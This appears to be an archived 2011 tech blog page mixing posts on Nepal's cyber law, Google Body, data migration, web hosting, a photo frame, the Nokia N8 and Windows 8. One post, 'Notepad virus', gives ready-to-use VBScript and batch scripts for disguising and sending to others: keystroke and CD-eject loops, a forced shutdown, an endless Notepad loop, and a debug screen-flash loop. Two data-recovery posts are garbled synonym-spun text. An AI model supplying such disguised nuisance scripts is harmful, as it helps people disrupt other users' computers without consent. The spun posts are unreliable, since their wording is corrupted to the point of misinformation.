Friday, January 14, 2011

Crimes in Cyberspace & Law in Nepal Articles,

The worlds least developed countries including Nepal have rewarded themselves of the opportunity to rapidly develop education, health, agriculture, tourism, trade and various other sectors using Information Technology.

With the large development of Information Technology the criminal activities are also increasing. In Nepal, Cyber crimes like Software Piracy, Hacking etc. are increasing. Corruption is seen in every field – From government to private organizations are using pirated CDs. Software CDs can be seen in the footpaths of Kathmandu, which has decreased the value, as well as violated the law of the cyberspace. People are crowding into these places because of the low price. People want just the CDs. Who cares about the quality and law?
Program CDs of great value are found all over the Kathmandu valley and prices range from Rs. 50-100 (U.S $0.70 -1.40), but original software costs 100 times more than that. Though this is not new to any Nepali citizen, it may also attract the attention of some foreigners visiting Nepal. “Not only Nepalese, Foreigners also take these CDs”, said one Footpath CDs seller in Kathmandu. Whenever anyone buys a new software CD, it is shared with all his friends and relatives. It has become a habit for all Nepali people to share CDs.
This problem is not limited only to CDs. In Cyber cafes, children of young ages can be seen using porn sites. The proprietor of the CafĂ© not caring about the law, they just want all his computers to be packed. Different hackers’ software can be found in each individual’s computer.
To control those criminal activities the ‘Electronic Transaction Act’ is declared by Ministry of Information Technology and Telecommunication in 2005 A.D. which is popularly known as Cyber Law. Laws are established and enforced by the authority, legislation, or custom of a given community, state or nation to maintain orderly coexistence. Basically, Cyber law deals with child pornography, Cyber-stalking, Cyber-scams, online fraud, software piracy and much more.
In these approximately 5 years of declaration of Cyber Law, even a single percentage of crimes are not controlled. So there are still many doubts on successful implementation. Because Nepalese think “Laws are made to be broken”. This current Cyber Law has failed to address many problems. The law is not strict enough for the holistic deception of Cyber related crimes. Problems of online media, as well as fines and imprisonment, are not as big as in the U.S. and Japan.
The effective implementation of Cyber law is now a necessity. Nepal will not be able to regulate the information technology industries without taking the international legal context into account. The main thing is that regulations are enforced. First of all, the authorities should be self-concerned before awaking the citizens. There still needs a lot of homework to be done if Nepal expects a boom in the IT sector.
Anyway this law has provided new trust to the Information Technology (IT) sector, and computer and IT professionals are hopeful that it will create a favorable situation for conducting IT business. It contains a strong provision of punishment against Cyber crimes according to the nature of the crime. As per the provisions of law, the government is fully authorized to punish Cyber criminal, an individual or institution.
Since the computing field is a dynamic one, policies and laws related to this area need to be revised periodically to reflect the changing trends.
We cannot say that Law itself will solve all the problems, but we can also think of different solutions to different problems. First of all the government need to make the people aware of all these laws and policies as soon as possible. I suggest 3 kinds of actions to secure from Cyber crimes:-
1. Company should secure their networked Information.
2. Government should assure that they can implement law.
3. Firms, governments, and civil society should work cooperatively to strengthen legal frameworks for Cyber security.
‘Most great Cyber crime in Nepal is Software Piracy so to control this problem government and private IT Companies should aware the people to use free/open sources software which is free of cost.’

GOOGLE BODY BROWSER

Google Body is a detailed 3D model of the human body. You can peel back anatomical layers,
zoom in, click to identify anatomy, or search for muscles, organs, bones and more. You can also
share the exact scene you are viewing by copying and pasting the URL. Now you have power to browse body organs with google body browser. To use google body browser you will need Mozilla Firefox 4 Beta | Google Chrome Beta or Chromium | WebKit nightly | or some Other. 
 Try it you will love to use it. some of the previews are given below:
 

Monday, January 10, 2011

NOW YOU CAN MAKE VIRUS EASILY WITH NOTEPAD; NOTEPAD VIRUS

All this comand use to type in notepad
1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

Saturday, January 8, 2011

Transfer Your Data And Software Old PC to The New One

Usually if humans buy new computers the old ones are still alive to a assertive extent. They like to accumulate some of the old programs and files to alteration over to the new machine. Usually with the claimed files it is absolutely easy, but any paid programs could accord you problems due to licensing.

 One of the best means to move over your personal data is to alteration it to a USB anamnesis stick. You can aces these items up for a baby fee at a lot of administration food and all computer shops. Make abiding you get one that is big abundant to get the job done. Decide which abstracts and pictures as able-bodied as backed up email and, your admired bookmarks and annihilation abroad you wish to accumulate afresh move it over to your new anamnesis stick for alteration to the new PC. If you are on a home arrangement you can absolutely calmly abandon the USB stick and alteration your files over the network. You’ll acquisition that it works absolutely well, but you are traveling to charge backbone if you accept a ample bulk of abstracts to alteration because it is a adequately apathetic process.

Your programs may be simple to move over or they may be difficult, it depends on the software itself. Annihilation you downloaded for chargeless off the net can calmly be downloaded afresh if you can acquisition it. Any software that can accurately be run on as abounding computers as you like will be simple to alteration over.The ones that charge a authorization for anniversary PC will be a little added difficult. If you accept software like that affairs are you will charge to acquirement a new copy. If you’re advantageous you may just accept to conciliate it on the old apparatus to be able to actuate and run it on the new one. It may not be a accomplished lot of fun, but you’ll be extenuative yourself some money. I apperceive it’s a pain, but accumulate in apperception you alone charge to do this already and you’ll be acceptable to go. Look into the authorization acceding for anniversary software you wish to alteration so you apperceive what you’ll charge to do to get confused over.

Recover Lost Data From Windows XP

Your computer harder drive crashes accidentally wherein you are larboard with no advantage but to architecture the Windows and reinstall the operating arrangement to accomplish it anatomic again. Admitting this will advice you to accomplish the arrangement anatomic again, you could lose all the abstracts stored in the harder drive.
Much of the data loss occurs due to our advancement practices. If we systematically accomplish backups, your abstracts is insured to a ample extent. However, if you do not accept backups, the alone added way larboard is to use a abstracts accretion software. Abstracts accretion software helps you balance abstracts absent due to drive crash, formatting, re-partitioning, allotment abatement or to get aback accidentally deleted data.

You charge to ensure that you aces up the appropriate apparatus to balance absent data. A acceptable assessment should be able to balance absent abstracts from your deejay drive, back abundant of the abstracts is still present in the harder drive. These abstracts will abide in the harder drive, till you over address it with new files. This happens if you use the drive to abundance new data. Hence, it is acutely important to stop application the drive immediately. Do not try to architecture the harder drive or re-install the operating arrangement if you wish to balance abstracts from it. Even afterwards re-installing operating system, admitting you can balance data, there is no agreement that the absolute abstracts can be recovered successfully.
Next, you charge to baddest a acceptable abstracts retrieval software program. Install this software to addition advantageous drive. Remove the comatose drive and attach this to the advantageous harder drive to balance absent data

Transferring your website, Now you can

I was before this maintaining a website but I used to face many difficulties with the quality and dependability provided by the services. My website was not capable to hold all the traffic that I had amassed for a period or there was no high-quality customer support when I required it. As a result, I started my search for an additional provider that would be able to provide me superior service and let me transfer my domain name without difficulty.
I did lot of research on the internet for a period and got into contact with a friend who in addition had a few experiences with web sites. He told me regarding this web hosting site webhostinghub.com. Fortunately they contain the right service for me. They present web hosting transfer. They have made it a thorough justification of how this can take place reducing any danger on my behalf- for example not being fulfilled with the additional product or being gone without a provider to host my website.


The procedure is like this. First, you sign on with web hosting hub. They give you a short-term URL where you upload all your documents, folder and descriptions form your site. Then, you are able to create your e-mail accounts and look into how the entire things take place together before making it final. Then, you are able to transfer your domain devoid of any website downtime at all. I did it myself. The whole thing worked very well. The short-term URL permitted me to restore my website in total again. I decided to create some latest in fact nice changes too. In addition, I am excessively happy with the excellent price I paid for the whole thing.

Friday, January 7, 2011

Parrot Digital Photoframe – NOW you actually want one

Okay so let’s face it, a digital frame, is a digital frame, is a digital frame, and as you get your 3rd one, as a gift from your soon to be ex-boyfriend, you wonder why the screensaver slideshow on your computer wasn’t already good enough to put some of these guys out of business, but you smile, and put on your “oh I love it” face anyway…
Well, fresh from CES, Parrot just unveiled the DIA, the first digital photo frame that you really will be happy to receive. The DIA is less like an old digital frame and more like a movie screen that has a picture projected upon it.
The DIA’s LCD display is separate from it’s backlight, which gives your favorite photos a beautiful, designer friendly, transparent effect, very different from the digital frames of, well, just yesterday.
The frame itself is fairly plain, with its controls on the top and the SD card slot and USB ports on the side. Photos are added by USB, SD or alternatively, you can send photos to the frame wirelessly via Wi-Fi or Bluetooth.
DIA playfully provides some additional functionality by adding a few bells and whistles not seen before, with an unusual selection of preinstalled apps. Or you can consult the Frame Channel, and select your own apps. So, see your favorite pictures, check the news and weather, check the financial channel, Facebook, or just send pics directly to the frame with your iPhone. Yup, theres an app for that too.
The Parrot DIA probably wont be available until February, and we don’t know for how much, but something tells me I won’t be stacking 5 of them in my closet for next Christmas.

Monday, January 3, 2011

Nokia N8 official! Price, specs and pics!

GLOBAL – The Nokia N8 today officially emerges into the daylight, stepping out of the shadows equipped with a host of smartphone talents. The first device to be powered by the brand new Symbian^3 platform, the Nokia N8 will launch with a new breed of camera that promises to capture photos and video to rival dedicated point and shoot cameras. Read on to explore Nokia N8′s full list of talents.



The biggest feature on the Nokia N8 is its 12-megapixel camera with Carl Zeiss optics and Xenon flash. It features a substantially larger sensor than any ever used in any other Nokia device – even bigger than many found in dedicated cameras. Recently, we caught up with Nokia’s resident camera guru, Damian Dinning, to get the full lowdown on what went into fine-tuning the N8′s camera and video capture skills – you’ll be able to read the full fact-packed story right here on Conversations this week, so stay tuned.
Check out the first sample images from the Nokia N8
The Nokia N8 also introduces the ability to record high definition videos and edit them with a smart built-in editing suite on the device. Playback quality is just as important, and the 3.5-inch HD capacitive touchscreen is the ideal window for assessing your flicks and footage. There’s also a HDMI connector allowing you to hook the smartphone to your HD TV and share your media with friends and family in superb quality. We wanted to find out more about the benefits of HDMI in the Nokia N8 so we spoke to Paul Wheeler, a software program manager at Nokia, to get the full story – again, be sure to keep an eye out for our full story this later this week.
Check out the first HD video sample from the Nokia N8
The Nokia N8 also doubles as a portable entertainment centre. Watch HD quality video with Dolby Digital Plus surround sound and hook into a dedicated Web TV application for access to news and entertainment on the move.
It’s not just its 12-megapixel camera and HD video skills with HDMI support that set the Nokia N8 apart from the crowd. Packing more memory than most, the Nokia N8 has 16GB of built-in storage and is expandable up to 48GB with a micro SD card.
Joining the social messaging fold with the likes of the latest Eseries and Cseries devices, the N8 enters the fray with live Twitter and Facebook updates direct to your homescreen. Comment, read and send messages, update your status and share your location and photos with one touch.
Embracing location based services, the N8 is location-savvy and comes with free global Ovi Maps walk and drive navigation with support in more than 70 countries worldwide.
Powering the Nokia N8 is the all-new Symbian^3 platform. This latest incarnation introduces major new advances including multi-touch and support for gestures such as pinch-to-zoom. Onboard there’s also three customisable homescreens that can be loaded with applications and widgets and flicked through by a swish of the finger. There’s also improved 2D and 3D graphics for a faster and more responsive UI, greater memory management and a visual task manager.
Of course, the Nokia N8 comes with access to the full range of Ovi services and it’s Nokia’s first smartphone to be integrated with Qt. Got and idea for an app? Qt is a software development environment that makes it a cinch to build apps and deploy across the Symbian and other software platforms.
Not to be outdone by its innards the Nokia N8 is carved from a single piece of anodised aluminium and looks glorious decked in one of five eye-catching colours (we’ll shortly be bringing you an entire article dedicated to the colours). It will cost €370 (before the usual local taxes and subsidies) when it starts shipping in the third quarter of 2010.
Over the coming week we’ll bring you heaps more insight and info surrounding the new Nokia N8, including designer interviews, exclusive videos, and much more. Stay tuned for all our unmissable coverage throughout the week. In the meantime, share your instant reactions and let us know what you want to know about the Nokia N8 by joining the conversation below.
Check out more at Nokia.com






WINDOWS 8

Now that you’re getting comfortable with Windows 7, it’s time to start thinking about the future. Windows 8 (or whatever it may be called) is well under way by now (it takes years for Microsoft to develop an operating system), so it was only a matter of time before the first real details would find their way out of Redmond.

The biggest motherlode yet has been tapped by Microsoft Kitchen, via Italian Windows site Windowsette — a deck of confidential slides that outline Microsoft’s goals for Windows 8 and how the operating system will be designed and sold.

Some of the most cogent details from the slides are outlined below. Note that, for now, all of these items should be considered mere “considerations,” and that any or all of them could eventually be stripped away from Windows 8 before it is actually released.

To wit:

• Microsoft is in a full-on love-affair with Apple, and for good reason. Complexity is out, simplicity is in. Can Microsoft really follow through with making Windows 8 “just work” a la Apple? It certainly wants to, and thinks “this is something people will pay for!”
• Webcams will be a big focus for Windows 8, with the potential goal of letting Windows 8 log you in automatically via camera image. Some vendors have built this separately already for earlier versions of Windows, and users seem to like it.
•  Windows 8 will embrace “the cloud” by letting you take your workspace from one PC to another via a single login that’s connected to the web. So now you can borrow my computer and I don’t have to worry about my precious documents getting disorganized.
• You’ll also be able to more easily combine your personal computing environment with your business workspace. It’s unclear exactly how, but presumably Microsoft’s cloud focus will play a part here. Yay, more time to work!
• Microsoft is focusing on three computing-form factors when Windows 8 is released: Slates (tablets), laptops, and all-in-one PCs. Traditional desktops may still be around, but this isn’t a major focus of the OS, and for good reason, since sales are falling off a cliff.
• Windows 8 will hopefully start up faster than ever before, thanks to a new and as-yet-undeveloped operating mode.
• More advanced help and support systems were meant to be part of Windows 7, but anyone who’s used the Windows 7 troubleshooters knows this didn’t happen. They’re back with Windows 8.
• One-button “Reset Windows” option will take your computer back to its original state while leaving your personal documents and settings intact. System Restore gets a big upgrade.
• There’s a Windows 8 App Store in the works, which will offer apps for any Microsoft/Windows device, from PC to phone to Zune. It even already has a URL: windowsstore.com.

Windows 8 has no release schedule yet, but the company is on record as targeting three years between its OS updates, which would put things on track for a 2012 release. We’re very early in this process, so stay tuned for more details as they’re announced, or, more likely, leaked.